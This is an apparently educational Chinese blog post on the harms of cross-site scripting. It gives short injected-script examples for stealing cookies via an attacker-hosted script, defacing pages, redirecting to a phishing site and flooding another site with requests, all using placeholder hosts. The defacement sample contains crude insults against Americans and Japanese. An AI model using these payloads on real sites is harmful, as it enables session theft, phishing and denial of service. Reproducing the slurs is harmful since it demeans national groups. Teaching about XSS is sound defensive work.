zoukankan      html  css  js  c++  java
  • XSS详解【2】---主要危害及其原理

    本文详细讲解XSS主要危害及其原理。

    一 说明

    XSS攻击最终发生在用户的浏览器上,攻击者利用XSS漏洞可执行任意的JavaScript脚本,所以JavaScript脚本能做的操作攻击者都可以做。

    主要的危害有如下:

    1)窃取Cookie,盗用sessionid等敏感信息,进而仿冒合法用户的身份进行操作,导致用户数据泄露、被篡改等;如果用户属于管理员等高权限用户,就有可能对整个系统产品危害;

    2)篡改网站页面,显示非法信息;

    3)重定向页面到钓鱼网站;

    4)对其他网站进行DDoS攻击;

    5)劫持流量实现恶意跳转。

    二 窃取Cookie,盗用sessionid等敏感信息

    2.1 主要危害

    窃取Cookie,盗用sessionid等敏感信息,进而仿冒合法用户的身份进行操作,导致用户数据泄露、被篡改等;如果用户属于管理员等高权限用户,就有可能对整个系统产品危害。

    2.2 窃取cookie的方法

    1)A攻击者在S论坛网站的留言板区域输入<script scr=”js_url”></script>,这里的js_url是A自己的电脑启动的一个服务器上边资源;

    2)B是一个S论坛用户,S访问到浏览板块时,B的浏览器就会加载上边的脚本,向A的服务器请求js资源,注意,这个请求会携带cookie等信息;

    3)A这时就能拿到B的cookie等重要信息,在通过一些其它小工具,就能不输入账号密码,通过B用户的身份进行登录S网站了,这时候就可以肆意进行操作了。

    三 篡改网站页面

    3.1 主要危害

    显示非法信息(例如:非法广告、非法图片、非法链接、非法新闻等等)。如果网站流量很大,会造成很大危害。

    3.2 篡改网站页面方式:

    1)A攻击者在S论坛网站的留言板区域输入下边内容:

    1 <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
    2 <script type="text/javascript">
    3     var $insert = $('<div>世界即将毁灭,人类即将毁灭!!!美国是SB!!!小日本是SB</div>');
    4     $('body').append($insert);
    5 </script>

    2)B是一个S论坛用户,访问到浏览板块时,B的浏览器就会加载上边的脚本,这时候,B的浏览页面中就会显示出上边那段攻击者构造的内容了。

    四 重定向页面到钓鱼网站

    4.1 主要危害

    用户将无法正常访问原来网站,“钓鱼网站”的页面与真实网站界面基本一致,欺骗消费者或者窃取访问者提交的账号和密码信息。

    4.2 重定向到钓鱼网站的方法

    1)A攻击者在S论坛的留言板区域输入下边内容:

    1 <script type="text/javascript">
    2     window.location.href = "https://www.xxxxx.com";
    3 </script>

    说明:上边的https://www.xxxxx.com地址,是一个和S网站登录页面几乎一样的页面,而这个页面对应的后台是A攻击者自己的服务器。

    2)B是一个S论坛用户,访问到浏览板块时,B的浏览器就会加载上边的脚本,这时候,页面就重定向到了https://www.xxxxx.com。

    而这个地址对应的页面又与S网站登录页一样,如果用户直接输入用户名和密码,直接提交,这时A在后台服务器就拿到了用户的用户名和密码。

    五 对其它网站进行DDos攻击

    5.1 主要危害

    注入脚本让浏览器向其他网站发送请求,如果漏洞网站本身的访问量很大,就会导致其他网站瞬间涌入大量流量,造成拒绝服务攻击。具体案例可参考:http://www.freebuf.com/news/33385.html

    5.2 对其它网站进行DDos攻击方法

    1)A攻击者在S论坛的留言板区域输入下边内容:

    1 <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
    2 <script type="text/javascript">
    3     setInterval(function () {
    4         $.getScript("https://xxxxxxx.com/xxxx.js");
    5     }, 10)
    6 </script>

    2) 如果S网站是是一个浏览量很大的网站,这时候只要有一个用户在浏览这个网站的留言板,每秒就会给https://xxxxxxx.com/发送100次请求,如果同时有10万人浏览,就会造成每秒1000万次请求,而且是一直持续不断的,很有可能导致对应网站的服务器瘫痪掉或者拒绝访问。

    六 劫持流量实现恶意跳转

    6.1 主要危害

    导致原网站不可用,实现恶意流量导向。例如:将京东卖奶粉的页面自动重定向到淘宝卖奶粉的页面,这样导致京东卖奶粉的损失惨重。

    6.2 劫持流量进行恶意跳转方法

    这里不再详细写了,参考上边5.2中重定向到钓鱼网站的方法即可。

  • 相关阅读:
    angular js 自定义指令
    web api 解决跨域的问题
    angular 监听ngrepeat结束时间
    redis关闭和启动
    intellij idea快捷键
    mysql连接字符串
    crontab命令格式
    maven中scope属性的
    maven pom文件元素说明
    引入maven以外的jar包
  • 原文地址:https://www.cnblogs.com/zhaoweikai/p/12220710.html
Copyright © 2011-2022 走看看